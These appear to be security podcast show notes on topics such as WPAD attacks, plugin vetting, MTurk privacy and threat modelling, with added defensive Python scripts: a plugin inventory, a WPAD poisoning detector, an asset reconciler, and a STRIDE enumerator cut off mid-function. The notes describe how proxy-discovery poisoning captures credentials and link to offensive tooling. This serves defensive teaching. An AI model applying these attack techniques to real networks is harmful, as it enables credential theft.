Require reviews for new plugins, and old ones, esp if they haven’t updated in a while
Are they still maintained? (abandonware bad)
New owners? (many plugins and apps get bought and then start changing permissions, or worse, serving malware)
Joomla -
Vulnerable Extensions list - https://vel.joomla.org/live-vel
Wordpress - WPScan https://wpvulndb.com/plugins
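Answering "do you know what your CMS is running?" starts with an inventory, and the review-on-update suggestion above needs something to compare that inventory against. The script below is an added example, not code from the show, from WordPress or from WPScan; the plugin sources and the approved list are constructed. It reads the header comment that WordPress plugins carry in their main file (Plugin Name, Version and so on), builds the inventory, and queues anything that is not on the reviewed list or whose version has changed since it was reviewed.

```python
"""Inventory of installed WordPress-style plugins from their header comments,
plus a review queue against the plugins that were actually vetted.
Added example; the plugin sources and the approved list are constructed."""
import re

# WordPress reads these fields from the first comment block of a plugin's main file.
HEADER_RE = re.compile(
    r"^\s*\*?\s*(Plugin Name|Plugin URI|Version|Author):\s*(.+?)\s*$", re.M)
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)

# Constructed: {path relative to wp-content/plugins: file contents}
PLUGIN_FILES = {
    "contact-form-lite/contact-form-lite.php":
        "<?php\n/*\nPlugin Name: Contact Form Lite\nPlugin URI: https://example.com/cfl\n"
        "Version: 2.3.1\nAuthor: Example Co\n*/\n",
    "gallery-plus/gallery-plus.php":
        "<?php\n/**\n * Plugin Name: Gallery Plus\n * Version: 1.0.9\n */\n",
    "gallery-plus/includes/helpers.php":
        "<?php\n// helper functions, no plugin header\n",
    "seo-booster/seo-booster.php":
        "<?php\n/*\nPlugin Name: SEO Booster\n*/\n",
}

# Constructed: what the last review signed off on (name -> version).
APPROVED = {"Contact Form Lite": "2.3.1", "Gallery Plus": "1.0.7"}

def parse_plugin_header(source):
    """Header fields of a plugin file, or {} if it has no header comment."""
    m = COMMENT_RE.search(source)
    if not m:
        return {}
    return dict(HEADER_RE.findall(m.group(0)))

def inventory(plugin_files):
    """One record per plugin entry point; files without a Plugin Name are skipped."""
    records = []
    for path, source in sorted(plugin_files.items()):
        header = parse_plugin_header(source)
        if "Plugin Name" not in header:
            continue
        records.append({"file": path,
                        "name": header["Plugin Name"],
                        "version": header.get("Version", "unknown")})
    return records

def review_queue(records, approved):
    """Plugins needing a (re-)review: unknown to the approved list, or a different version."""
    queue = []
    for r in records:
        if r["name"] not in approved:
            queue.append((r["name"], "not on approved list"))
        elif r["version"] != approved[r["name"]]:
            queue.append((r["name"], f"version {r['version']} differs from reviewed {approved[r['name']]}"))
    return queue

if __name__ == "__main__":
    recs = inventory(PLUGIN_FILES)
    for r in recs:
        print(f"{r['name']:20s} {r['version']:8s} {r['file']}")
    for name, why in review_queue(recs, APPROVED):
        print("REVIEW:", name, "-", why)
```

On a real install, walk wp-content/plugins and feed the file contents in; a plugin with no Version header is itself a signal worth a look, which is why it is reported as "unknown" rather than dropped. The resulting name/version list is also exactly what you need to query the WPScan and Joomla vulnerable-extension databases linked above.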
https://theconversation.com/explainer-how-malware-gets-inside-your-apps-79485
CCleaner -
https://www.theverge.com/2017/9/18/16325202/ccleaner-hack-malware-security
News:
Adversary generation systems
Red Baron - https://www.coalfire.com/Solutions/Coalfire-Labs/The-Coalfire-LABS-Blog/february-2018/introducing-red-baron
https://github.com/uber-common/metta
https://github.com/NextronSystems/
https://www.kitploit.com/2018/02/venom-1015-metasploit-shellcode.html
Quickly building Redteam Infrastructure
https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/
Published on: February 14, 2018
Show Notes:
https://docs.google.com/document/d/1CSjskf-3vrguoyIyg8yOK2KLqg7srxYlee4RD6jzgNc/edit?usp=sharing
Topics Discussed:
New tool : AutoSploit - Does it lower the bar?
How should Blue teamers be using Shodan?
Discuss WPAD attacks, what WPAD is, and why it's a thing blue teams should worry about.
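Why WPAD matters to a blue team, in detection form: the script below is an added example, not code from the show. Windows proxy auto-discovery tries DHCP, then DNS for wpad.<domain>, and then falls back to LLMNR and NetBIOS name queries on the local segment; a tool such as Responder answers that fallback and hands the victim a PAC file that routes its browser through the attacker, who can then demand NTLM authentication. The log lines, the key=value format and the approved wpad host are all constructed; the logic flags any LLMNR/NBNS answer for wpad (nothing legitimate gives one), any DNS answer for the wpad name that is not the sanctioned address, and the NXDOMAIN that tells you a client is about to fall back.

```python
"""Detection of WPAD proxy-discovery abuse in name-resolution logs.
Added example over constructed key=value log lines; the approved wpad
name/address and the log format are assumptions."""
import re
from collections import defaultdict

KV_RE = re.compile(r"(\w+)=(\S+)")

# Assumed: the only sanctioned wpad name and what it must resolve to.
APPROVED_WPAD = {"wpad.corp.example": "10.0.0.5"}

# Constructed log lines (not any real product's format).
LOG = """\
ts=2018-02-14T09:00:01Z proto=DNS type=query src=10.0.0.23 dst=10.0.0.2 name=wpad.corp.example
ts=2018-02-14T09:00:01Z proto=DNS type=response src=10.0.0.2 dst=10.0.0.23 name=wpad.corp.example answer=10.0.0.5
ts=2018-02-14T09:05:10Z proto=DNS type=response src=10.0.0.2 dst=10.0.0.31 name=wpad.corp.example answer=NXDOMAIN
ts=2018-02-14T09:05:10Z proto=LLMNR type=query src=10.0.0.31 dst=224.0.0.252 name=wpad
ts=2018-02-14T09:05:10Z proto=LLMNR type=response src=10.0.0.99 dst=10.0.0.31 name=wpad answer=10.0.0.99
ts=2018-02-14T09:05:12Z proto=NBNS type=response src=10.0.0.99 dst=10.0.0.44 name=WPAD answer=10.0.0.99
ts=2018-02-14T09:06:00Z proto=DNS type=response src=10.0.0.2 dst=10.0.0.23 name=www.corp.example answer=10.0.0.80
""".splitlines()

def parse(line):
    return dict(KV_RE.findall(line))

def is_wpad(name):
    return name == "wpad" or name.startswith("wpad.")

def wpad_alerts(lines, approved=APPROVED_WPAD):
    """Return (alerts, poisoners). alerts: list of (ts, message).
    poisoners: LAN host that answered for wpad -> set of victims it answered."""
    alerts = []
    poisoners = defaultdict(set)
    for line in lines:
        ev = parse(line)
        name = ev.get("name", "").lower().rstrip(".")
        if ev.get("type") != "response" or not is_wpad(name):
            continue
        proto, src, dst = ev["proto"], ev["src"], ev["dst"]
        answer = ev.get("answer", "")
        if proto in ("LLMNR", "NBNS"):
            # Nothing legitimate answers "wpad" over link-local multicast or broadcast;
            # a peer that does is performing the poisoning step of a WPAD attack.
            alerts.append((ev["ts"], f"{proto} response for {name} from {src} to {dst} (answer {answer})"))
            poisoners[src].add(dst)
        elif proto == "DNS":
            wanted = approved.get(name, "none (name not on approved list)")
            if answer == "NXDOMAIN":
                alerts.append((ev["ts"], f"DNS: {name} did not resolve for {dst}; client will fall back to LLMNR/NBNS"))
            elif answer != wanted:
                alerts.append((ev["ts"], f"DNS: {name} resolved to {answer} for {dst}, approved address is {wanted}"))
    return alerts, dict(poisoners)

if __name__ == "__main__":
    alerts, poisoners = wpad_alerts(LOG)
    for ts, msg in alerts:
        print(ts, msg)
    for host, victims in poisoners.items():
        print(f"{host} answered wpad for {len(victims)} hosts: {sorted(victims)}")
```

The poisoners map is the triage view: one source answering wpad for several different victims within minutes is the signature of a poisoning tool rather than a misconfigured host. The preventive side is to register the wpad name in internal DNS (pointing at a real proxy or a sinkhole) so the fallback never happens, and to disable LLMNR and NetBIOS name resolution by policy.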
ANNOUNCEMENTS:
Ms. Amanda Berlin is running 4 sessions of her workshop "Disrupting the Killchain" starting on the 5th of February at 6:30pm Pacific Time (9:30 Eastern Time). If you would like to sign up, the fee is $100 and you can send that to our paypal account at https://paypal.me/BDSPodcast, sent as a 'gift'
Course Syllabus: https://docs.google.com/document/d/12glnkY0nxKU9nAvekypL4N910nd-Nd6PPvGdYYJOyR4/edit
Published on: February 5, 2018
Here is the inaugural episode of the "Brakeing Down Incident Response"
Please check it out!
BDIR Episode - 000
Our guests will be:
Dave Cowen - Forensic Lunch Podcast and G-C Partners
Tyler Hudak - Trainer in Malware Analysis and Reverse Engineering
Topic of the Day:
WHAT IS THIS NEW PODCAST ALL ABOUT, WHAT WILL IT COVER?
"Incident Response, Malware Discovery, and Basic Malware Analysis,
Detection and Response, Active Defense, Threat Hunting, and where does it fit within DFIR"
SHOW NOTES:
https://www.imfsecurity.com/podcast/2018/1/18/bdir-podcast-episode-000
Published on: January 29, 2018
Back in late 2017, we did a show about expensify and how the organization was using a service called 'Amazon Mechanical Turk' (MTurk) to process receipts and to help train their Machine Learning Algorithms. You can download that show and listen to it here: 2017-040
#infosec people on Twitter and elsewhere were worried about #privacy issues, as examples of receipts on MTurk included things like business receipts, medical invoices, travel receipts and the like.
One of our Slack members (@nxvl) reached out on our #Slack channel after the show and said that his company uses services like these. They use them to test applications, for unit testing, and to create test cases for training and refining their own applications and algorithms.
We discuss the privacy implications of employing these services, how to reduce the chances of data loss, the technology behind how they make the testing work, and what other companies should do if they want to employ MTurk or other 3rd parties.
Direct Show Download: http://traffic.libsyn.com/brakeingsecurity/2018-003-MTurk-NXVL-privacy_issues_using_crowdsourced_applications.mp3
ANNOUNCEMENTS:
Ms. Amanda Berlin is running 4 sessions of her workshop "Disrupting the Killchain" starting on the 4th of February at 6:30pm Pacific Time (9:30 Eastern Time). If you would like to sign up, the fee is $100 and you can send that to our paypal account at https://paypal.me/BDSPodcast
Course Syllabus: https://docs.google.com/document/d/12glnkY0nxKU9nAvekypL4N910nd-Nd6PPvGdYYJOyR4/edit
Show Notes:
Mr. Boettcher gave a talk (discuss) http://DETSec.org
Brakeing Down Incident Response Podcast
Amanda’s class (starts 4 February, $100 for 4 sessions, $50 for early video access)
I need to mention HITB Amsterdam
David’s Resume Review -- Bsides Nash Resume Review
SANS SEC504 Mentor course
Guest: Nicolas Valcarcel
Twitter: @nxvl
Possible News to discuss:
https://www.reddit.com/r/sysadmin/comments/7sn23c/oh_security_team_how_i_loathe_you_meltdown/
Mechanical Turk
CircleCi 2.0
https://circleci.com/docs/2.0/
TaskRabbit
https://www.taskrabbit.com/
Historically: https://en.wikipedia.org/wiki/The_Turk
Expensify using Amazon Mechanical Turk
https://www.theverge.com/2017/11/28/16703962/expensify-receipts-amazon-turk-privacy-controversy
https://www.wired.com/story/not-always-ai-that-sifts-through-sensitive-info-crowdsourced-labor/
FTA: “"I wonder if Expensify SmartScan users know MTurk workers enter their receipts. I’m looking at someone’s Uber receipt with their full name, pick up, and drop off addresses," Rochelle LaPlante, a Mechanical Turk worker who is also a co-administrator of the MTurk Crowd forum, wrote on Twitter.”
https://www.dailydot.com/debug/what-is-amazon-mechanical-turk-tips/
“About those tasks, they’re called HITs, which is short for Human Intelligence Tasks. A single HIT can be paid as low as a penny but may take only a couple seconds to complete. Requesters often list how long a task is supposed to take, along with the nature of the work and the requirements for completing the work.”
“Since mTurk has been around for over a decade, Amazon has created a special class of workers called Masters Qualification. Turkers with masters have usually completed over 1,000 HITs and have high approval ratings.”
Kind of like a Yelp for HIT reviewers?
Are companies like expensify aware of the data that could be collected and analyzed by 3rd parties?
Is it an acceptable risk?
Privacy questions to ask for companies that employ ML/AI tech?
Are they using MTurk or similar services to train their algorithms?
Are they using Masters-qualified workers for processing?
Nxvl links:
Securely Relying on the Crowd (paper Draft):
https://github.com/nxvl/crowd-security/blob/master/Securely%20relying%20on%20the%20Crowd.pdf
How to Make the Most of Mechanical Turk: https://www.rainforestqa.com/blog/2017-10-12-how-to-make-the-most-of-mechanical-turk/
How We Maintain a Trustworthy Rainforest Tester Network: https://www.rainforestqa.com/blog/2017-08-02-how-we-maintain-a-trustworthy-rainforest-tester-network/
The Pros and Cons of Using Crowdsourced Work: https://www.rainforestqa.com/blog/2017-06-06-the-pros-and-cons-of-using-crowdsourced-work/
How We Train Rainforest Testers: https://www.rainforestqa.com/blog/2016-04-21-how-we-train-rainforest-testers/
AWS re:Invent: Managing Crowdsourced Testing Work with Amazon Mechanical Turk: https://www.rainforestqa.com/blog/2017-01-06-aws-re-invent-crowdsourced-testing-work-with-amazon-mturk/
Virtual Machine Security: The Key Steps We Take to Keep Rainforest VMs Secure: https://www.rainforestqa.com/blog/2017-05-02-virtual-machine-security-the-key-steps-we-take-to-keep-rainforest-vms/
Published on: January 27, 2018
Ms. Berlin's course "Disrupting the Kill Chain" is planned to start on the 5th of February, and will be 4 sessions, with new material if you've seen her workshop at previous conferences. The cost of the class will be $100 USD for access to our Zoom webex. If you'd like to gain access to the videos we'll have for the class, you can buy access to them for $50 USD.
Sign up with our Paypal link: Paypal -- When paying, if you want us to send you a different email from your Paypal email, please add it to the 'NOTE' section during your payment.
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2018-002-John_Nye-Healthcares-biggest_issues-ransomware.mp3
From our friends at Hack In the Box Amsterdam:
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2018-001-A_new_year-new_changes-same_old_malware.mp3
The first show of our 2018 season brings us something new (some awesome new additions to our repertoire), and something old (ransomware).
Michael Gough is joining us to discuss a new partnership with the BrakeSec Podcast (you'll have to listen to find out, or wait a few weeks :D )
We discuss #Spectre and #meltdown vulnerabilities, wonder about the criticality of the vulnerabilities and mitigation of them, and debate why the patching was handled in such a poor manner.
We also discuss a news story about a school that spent an exorbitant amount of money to remove a trojan that Mr. Boettcher (@boettcherpwned) and Mr. Gough (@hackerhurricane) believe could have been handled very simply. We talk about the need for state and local governments and institutions to have some way to call for help with breaches or 'cyber' crises: a no-blame assistance helpline.
I did a quick video, which has a demonstration of Dave Kennedy's security tool "Pentester Framework" (PTF). There's even a video of the demo on our Youtube Channel (https://youtu.be/sIc1ljkwE5Q)
Finally, we discuss our upcoming training with Ms. Berlin (@infosystir) "Disrupting the Cyber Kill Chain", which will start the first week of February and go for 4 weeks. More details next week!
#Spotify: https://brakesec.com/spotifyBDS
RSS: https://brakesec.com/BrakesecRSS
Music change
Couldn’t remember where I got the other music
Little more news than we used to
Try to shy away from news everyone will talk about
Brakeing Down Incident Response (BD-IR) podcast
Hosted by Mr. Boettcher and Michael Gough
Vendor talks
Sponsors (provisionally)
News:
http://www.zdnet.com/article/wpa3-wireless-standard-tougher-wifi-security-revealed/
https://threatpost.com/new-rules-announced-for-border-inspection-of-electronic-devices/129361/
Upcoming Training:
Amanda? - Cyber KillChain training
Dates: Feb 5-26, Mondays at 9:30pm (4 one-hour sessions)
Matt Miller - Reverse Engineering course
More advanced, still working on details with him (no promises yet)
Michael Gough - Malware Archaeology
Austin - Feb or March - 1 Day Logging training - see AustinISSA.Org
Houston - April 3rd - 1 Day - HouSecCon
Preparing and Responding to an endpoint incident, what to configure, and look for
Tulsa - April 11-12th - 2 Days - BSides Oklahoma
Introduction to responding to an endpoint incident, Malware Discovery, what to configure, and look for
Job postings on our Slack
Sr. Manager, Vuln Mgmt, Amazon (Herndon, VA)
Michael Fourdraine @mfourdraine has several positions on his team in Bellevue, WA
He’s on Twitter (https://twitter.com/mfourdraine) or join us in our Slack
Many positions he has will relocate you to lovely Bellevue, WA
MG just posted “James Avery Information Security Manager”
Teaching a mentor course in Seattle (SEC504) starting March 1st.
Sign up: https://www.sans.org/mentor/class/sec504-seattle-01mar2018-bryan-brake
Great if you work a job where you get called a lot
Less likely to have to get up during class and walk away…
Bit of a technical discussion - PTF (pentester framework)
Setup, install software
Lighter than Kali
Works on debian, ubuntu, pretty much any linux
Slack
Invite only
Slack bot died
A new link every month is a bit of a PITA
Being popular invites bots… would like to reduce that risk by broadcasting an invite
Friend of mine was invited to speak on “A man’s view of women in technology” O.o (http://www.cmhwit.org/)
“ John ---- Actually, my plan at this point is to interview several of the successful woman I know in technology, followed by personal observations of how I've seen them become well respected leaders in the field.”
As is tradition (or is becoming one around here), we like to get a bunch of podcasters together and just talk about our year. No prognostications, a bit of silliness, and we still manage to get in some great infosec content.
Please enjoy! And please seek out these podcasts and have a listen!
Slight warning: some rough language
People and podcasts in attendance:
Tracy Maleef (@infosecSherpa)
Purple Squad Security Podcast (@purpleSquadSec) -
John Svazic (@JohnsNotHere)
Advanced Persistent Security (@advpersistsec) - Joe Gray (@C_3PJoe)
Danny Akacki (@dakacki) - RallySec Podcast (@rallysec)
Nate L (@gangrif) - Iron Sysadmin Podcast (@ironsysadmin)
Ms. Berlin and Mr. Boettcher are on holiday this week, and I (Bryan) went to Hushcon (www.hushcon.com) last week (8-9 Dec 2017). Lots of excellent discussion and talks.
While there, our friend Jay Beale (@jaybeale) came on to discuss Hushcon, as well as some recent news.
Google released an 0day for Apple iOS, and we talk about how jailbreaking repos seem to be shuttering, because there have not been as many vulns found that allow jailbreaking iDevices.
We also went back and discussed some highlights of last week's DFIR hierarchy show (https://brakesec.com/2017-041), along with real-world examples from someone who sees this on a regular basis. Jay's insights are something you shouldn't miss.
Finally, Ms. Berlin went to New Zealand and gave a couple of talks at Bsides Wellington (@bsideswlg). She interviewed Chris Blunt (https://twitter.com/chrisblunt) and "Olly the Ninja" (https://twitter.com/Ollytheninja) about what makes a good con.
Direct Link: https://brakesec.com/2017-042
--Show Notes--
https://github.com/int0x80/githump
https://techcrunch.com/2017/11/27/ios-jailbreak-repositories-close-as-user-interest-wanes/
https://securelist.com/unraveling-the-lamberts-toolkit/77990/
Published on: December 16, 2017
Maslow's Hierarchy of needs was developed with the idea that the most basic needs should be satisfied to allow for continued successful development of the person and the community inevitably created by people seeking the same goals.
DFIR is also much the same way in that there are certain necessary basics needed to ensure that you can detect, respond, and reduce possible damage inflicted by an attack.
While searching, we saw a tweet from Matt Swann (@MSwannMSFT) about a #github repo with just such a '#DFIR hierarchy of needs'. We discuss everything that is needed to build out a proper DFIR program.
Mr. Boettcher discusses with us the latest #malware trends, including malware that spreads by replying inside existing email threads from already-compromised accounts.
Direct Download Link: https://brakesec.com/2017-041
--Show Notes--
Malware report
https://www.lastline.com/labsblog/when-scriptlets-attack-excels-alternative-to-dde-code-execution/
https://www.securityforrealpeople.com/2017/10/exploiting-office-native-functionality.html
https://github.com/swannman/ircapabilities - DFIR Hierarchy
Based on Maslow’s Hierarchy of needs: https://en.wikipedia.org/wiki/Maslow's_hierarchy_of_needs
Requirements must be met before you can move on.
It’s not perfect, but gives a general idea of how needs should be met.
Published on: December 8, 2017
With Mr. Boettcher out this week due to family illness, Ms. Berlin and I discussed a little bit of what is going on in the world.
Expensify unveiled a new 'feature' where random people would help train their AI to better analyze receipts. Problem is that the random people could see medical receipts, hotel bills, and other PII. We discuss how they allowed this and the press surrounding it. We also discuss why these kinds of issues are prime reasons to do periodic vendor reviews.
Our second story was on Apple's "passwordless root" account. We talk about the steps to mitigate it, why it was allowed to happen, and why the most straight forward methods of dealing with something like this may not always be the best way.
Direct Link: https://brakesec.com/2017-040
---Show Notes---
Agenda:
Trip report from Amanda to New Zealand
Did we talk about Amanda’s appearance on PSW?
Discuss last week’s show about custom training
Comments? Suggestions for custom training solutions?
https://www.sans.org/mentor/class/sec504-seattle-01mar2018-bryan-brake
Expensify -
https://www.wired.com/story/not-always-ai-that-sifts-through-sensitive-info-crowdsourced-labor/
https://www.theverge.com/2017/11/28/16703962/expensify-receipts-amazon-turk-privacy-controversy
How is this different than like a medical transcriptionist?
Don’t you go in and modify the receipts yourself? Or is that a feature you can force?
It’s a privacy issue.
Hotel receipts, boarding passes, even medical receipts
Turn off ‘smart scan’?
Many companies like using it, and some will only accept smart scanned receipts
Fat fingering receipts isn’t ‘cool’
Snap a photo, move along
Expensify is global, and could have wide reaching effects for this new ‘feature’...
Expensify used Mechanical Turk, a ‘human intelligence tasks’
Micropayments to do menial tasks
Example of why periodic review of your 3rd parties is necessary
New ‘features’ = new nightmares
Privacy requirements change
Functionality not in alignment with your business goals
Apple ‘passwordless root’
High Sierra before today (29 November 2017) had the ability to login as root with no password…
That is a problem… Original Tweet: https://twitter.com/lemiorhan/status/935578694541770752
It also works on remote services, like ARD (apple remote desktop), and file shares…
Rolling IR
Was it necessary?
Serious, yes
Was discovered two weeks prior https://forums.developer.apple.com/thread/79235
Dev (chethan177) on the forum “didn’t realize it was a security issue”
Easy enough fix (Bryan IR story)
Open Terminal
Sudo passwd root
Change password
Do you trust users to do that? Not across a large enterprise
Published on: November 30, 2017
This week is a bit of a short show, as Ms. Berlin and Mr. Boettcher are out this week for the holiday.
I wanted to talk about something that I've started doing at work... Creating training... custom training that can help your org get around the old style training.
Also, we got some community audio from one of our listeners! "JB" went to a SANS event in Berlin, Germany a few weeks ago, and talked to some attendees, as well as Heather Mahalik (@HeatherMahalik), instructor of FOR585: Advanced Smartphone Forensics.
Take a listen and we hope you enjoy it!
Direct Link: https://brakesec.com/2017-039
---Show notes (from Bryan and JB)---
Ms. Berlin in New Zealand
Mr. Boettcher with the family
Training
What makes us despise training so much?
Cookie cutter
Scenarios do not match environments
Speaking is a little too perfect
Flash based
UI is horrible
Outdated
Easy questions
Infosec training is worse
2 hours of training each year
Not effective
Why not make your own?
Been doing it at work
No more than 7 minutes
Custom made
Tailored for your own company
Do your training like a talk at a con
Time limit: 7 (no more than 10 minutes)
Create some slides (5-7 slides)
Do it on a timely topic
Recent tabletop exercise results
Recent incident response
Phishing campaign
Script or no-script required
Sometimes talking plainly can be enough
https://screencast-o-matic.com/ - Windows (free version is 7 minutes long)
Quicktime - OSX (free) (Screenflow)
Handbrake (convert to MKV or MP4)
Microphone (can use internal microphones if you have a quiet place)
[begin notes: SANS Berlin REMOTE segment]
corresp. JB
reach jb at
(@cherokeejb_) on brakesec slack, twitter, & infosec.exchange
--link to all trainers and info from archive SANS Berlin 2017 https://www.sans.org/event/berlin-2017/
--pre-NetWars chat with the SEC 503 class:
-what do you like about SANS conference
-european privacy laws, even country to country!
-biggest priority for next year: building a SOC, working together with sales, asset management, constant improvement, password reuse
--special BrakeSec members only cameo
--“bring your own device” interview with an Information Security/forensics professional
password elimination or no reuse
--interview with Heather Mahalik (@HeatherMahalik)
Bio https://www.sans.org/instructors/heather-mahalik
-“game over” whatsapp, unpatched android, other known-historically weak tools as “assume breach of mobile”
-intersection of network forensics and mobile
-open source tools and the lack of, how to judge your tools
-Heather’s recent blog
-getting into mobile, decompiling, etc.
-number one topic for next year: encryption for Android 8 Oreo, iOS 12
-“most popular android is still v4.4”
Heather’s blog we mentioned
http://smarterforensics.com
link to the book Heather mentioned:
https://www.amazon.com/Practical-Mobile-Forensics-Heather-Mahalik/dp/1786464209/
--link to blog mentioned, jb’s initial reflections on SEC 503
https://www.linkedin.com/pulse/whaaaa0101-0000-0011t-aka-extracting-files-out-pcaps-foremost
JBs blog main link, or if you’re not a fan of linkedin
https://cherokeejb.blogspot.de/
small featured music clips used with permission from YGAM Records, Berlin
“Ж” by the artist Ōtone (Pablo Discerens), (c)(p)2016
Get it for free or donate at http://ygam.bandcamp.com !
book club EMEA!:
message JB or David (@dpcybuck) or any of us on brakesec slack if you want to take part in the book club conversations live, but can’t make the main call !
--
-
[end segment]
Published on: November 23, 2017
Direct Link: https://brakesec.com/2017-038
Michael De Libero spends his work hours running an application security team at a gaming development company. I (Bryan) was really impressed at the last NCC Group Quarterly meetup when he gave a talk (not recorded) about how to properly build out your Application Security Team.
So I asked him on, and we went over the highlights of his talk. Some of the topics included:
Discussing with management your manpower issues
Who to include in your team
Communication between teams
----SHOW NOTES:
Amanda’s appearance on PSW
Building an AppSec Team - Michael de Libero (@noskillz)
https://techbeacon.com/owasp-top-ten-update-what-your-security-team-needs-know
https://www.owasp.org/index.php/OWASP_AppSec_Pipeline
Need link to Michael’s slides -- https://docs.google.com/presentation/d/1Bvl2rybuWMdOu3cs03U85zwAvrM1RNxv99Dt-YiGiys/edit?usp=sharing
Random Notes from Mike:
How do you sell a company on having an appsec team if they don’t have one?
If you have an existing ‘security team’, how easy is it to augment that into an appsec team?
Can you do job rotation with some devs?
Do devs care enough to want to do code audits
“That’s not in my job description”
Skills needed in an appsec team
Does it depend on the tech used, or the tech you might use?
Internal security vs. consultants
Intro to RE course with Tyler Hudak
Bsides Wellington speaker Amanda Berlin
Published on: November 15, 2017
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-037-asset_management.mp3
We started off the show talking to Mr. Boettcher about what DDE is and how malware is using this super legacy Windows component (found in Windows 2) to propagate malware in MS Office docs and spreadsheets. We also talk about how to protect your Windows users from this.
We then get into discussing why it's so important to have proper asset management in place. Without knowing what is in your environment, you could suffer gaps in coverage of your anti-virus/EDR software, be unable to patch systems properly, and even make lateral movement easier.
Finally, we discuss our recent "Introduction to Reverse Engineering" course with Tyler Hudak (@secshoggoth), and Ms. Berlin's upcoming trip to New Zealand.
SHOW NOTES:
Oreilly con report
Malware report from Mr. Boettcher
DDE (Dynamic Data Exchange), all the rage
https://en.wikipedia.org/wiki/Windows_2.0
http://home.bt.com/tech-gadgets/computing/10-facts-about-windows-2-11364027546216
https://www.ghacks.net/2017/10/23/disable-office-ddeauto-to-mitigate-attacks/
Why asset management?
Know what’s in your environment
CIS Top 20...no wait, it’s the TOP THREE of the 20.
It all builds on this…
Know what’s in your environment
https://metacpan.org/pod/App::Netdisco <- NetDisco (great for network equipment)
Where do you store that data? Or is it just enough to know where to get it?
Systems you can pull asset data from:
Patching systems
Chef
WSUS
FIM systems
Tripwire
DLP systems
Vuln Scanners
AV/EDR management
router/switch tables
DNS
Asset management systems are a gold mine for an attacker
Names
IPs
email addresses
Coverage gaps in these systems will cause you to lose asset visibility
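The coverage-gap point above can be checked mechanically: pull the host list from every system that sees or protects an endpoint, then diff them. The script below is an added example (not from the podcast); the four inventories are constructed sample exports standing in for DNS, switch tables, WSUS and an AV/EDR console.

```python
"""Reconcile asset inventories from several sources to surface coverage gaps.

Added example: the inventories below are constructed sample data standing in
for exports from DNS, switch MAC/ARP tables, WSUS, and an AV/EDR console.
"""
from collections import defaultdict

# Constructed sample exports. Each source reports the hostnames it knows about.
SOURCES = {
    "dns":    {"web01", "WEB02.corp.example", "db01", "hr-laptop-7", "printer-3f", "build01"},
    "switch": {"web01", "web02", "db01", "hr-laptop-7", "printer-3f", "build01", "unknown-0a1b"},
    "wsus":   {"web01", "web02", "db01", "hr-laptop-7"},
    "av_edr": {"web01", "web02", "hr-laptop-7", "build01"},
}

# Sources that merely observe that a host exists vs. sources that protect it.
OBSERVED = ("dns", "switch")
CONTROLS = ("wsus", "av_edr")


def normalize(name: str) -> str:
    """Hostnames arrive in mixed case and sometimes as FQDNs; compare on the short, lowercased name."""
    return name.strip().lower().split(".")[0]


def build_inventory(sources):
    """Map each normalized hostname to the set of sources that report it."""
    inventory = defaultdict(set)
    for source, hosts in sources.items():
        for host in hosts:
            inventory[normalize(host)].add(source)
    return inventory


def coverage_gaps(sources, controls=CONTROLS):
    """Return {hostname: [missing controls]} for every host seen anywhere but absent from a control."""
    inventory = build_inventory(sources)
    gaps = {}
    for host, seen_in in sorted(inventory.items()):
        missing = [c for c in controls if c not in seen_in]
        if missing:
            gaps[host] = missing
    return gaps


def orphans(sources, controls=CONTROLS):
    """Hosts known only to passive sources (DNS, switch tables) and to no security control at all."""
    inventory = build_inventory(sources)
    return sorted(h for h, seen in inventory.items() if seen.isdisjoint(controls))


if __name__ == "__main__":
    for host, missing in coverage_gaps(SOURCES).items():
        print(f"{host:14} missing from: {', '.join(missing)}")
    print("no control at all:", orphans(SOURCES))
```

The split between "observed" and "control" sources is the point: a host that shows up in a switch table but in no patching or EDR console is exactly the gap the show describes, and the passive sources are the ones an attacker would also enumerate, so the reconciliation should run from them rather than from the control consoles alone.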
http://www.businessinsider.com/programmer-automates-his-job-2015-11
Published on: November 8, 2017
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-036-Adam_Shostack-threat_modeling.mp3
Adam Shostack has been a fixture of threat modeling for nearly 2 decades. He wrote the 'threat modeling' bible that many people consult when they need to do threat modeling properly.
We discuss the different threat modeling types (STRIDE, DREAD, Trike, PASTA) and which ones Adam enjoys using.
Mr. Boettcher asks how to handle people who believe one OS is better than another, and how threat modeling can be used to decide which OS should be the one to use.
Stay after for a special post-show discussion with Adam about his friend Stephen Toulouse (@stepto).
SHOW NOTES:
Ideas and suggestions here:
Start with “What is threat modeling?” What is it, why do people do it, why do organizations do it?
What happens when it’s not done effectively, or at all?
At what point in the SDLC should threat modeling be employed?
Planning?
Development?
Can threat models be modified when new features/functionality gets added?
Otherwise, are these just to ‘check a compliance box’?
Data flow diagram (example) -
process flow
External entities
Process
Multiple Processes
Data Store
Data Flow
Privilege Boundary
Classification of threats-
STRIDE - https://en.wikipedia.org/wiki/STRIDE_(security)
DREAD - https://en.wikipedia.org/wiki/DREAD_(risk_assessment_model)
PASTA - https://www.owasp.org/images/a/aa/AppSecEU2012_PASTA.pdf
Trike - http://octotrike.org/
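To connect the data flow diagram elements listed above with the STRIDE classification, here is an added example (not from the podcast or from Adam's book) that walks a small, constructed DFD and enumerates threats per element. It uses the STRIDE-per-element mapping (external entities get S and R; processes get all six; data flows and stores get T, I and D, with R added for stores that hold audit logs) and flags the flows that cross a privilege boundary, since those are the ones reviewed first.

```python
"""Enumerate STRIDE-per-element threats for a small data flow diagram.

Added example. The diagram below is a constructed three-tier web app; the
element-type mapping follows the common STRIDE-per-element table.
"""
from dataclasses import dataclass

STRIDE = {
    "S": "Spoofing", "T": "Tampering", "R": "Repudiation",
    "I": "Information disclosure", "D": "Denial of service",
    "E": "Elevation of privilege",
}

# Which STRIDE categories apply to each kind of DFD element.
PER_ELEMENT = {
    "external_entity": "SR",
    "process": "STRIDE",
    "data_flow": "TID",
    "data_store": "TID",   # "R" is appended when the store is an audit log
}


@dataclass
class Element:
    name: str
    kind: str       # external_entity | process | data_store
    zone: str       # which side of a privilege boundary the element sits on
    is_log: bool = False


@dataclass
class Flow:
    name: str
    src: str
    dst: str


def applicable(el: Element) -> str:
    """STRIDE letters that apply to one element."""
    cats = PER_ELEMENT[el.kind]
    if el.kind == "data_store" and el.is_log:
        cats += "R"   # a log store can be attacked to deny that something happened
    return cats


def enumerate_threats(elements, flows):
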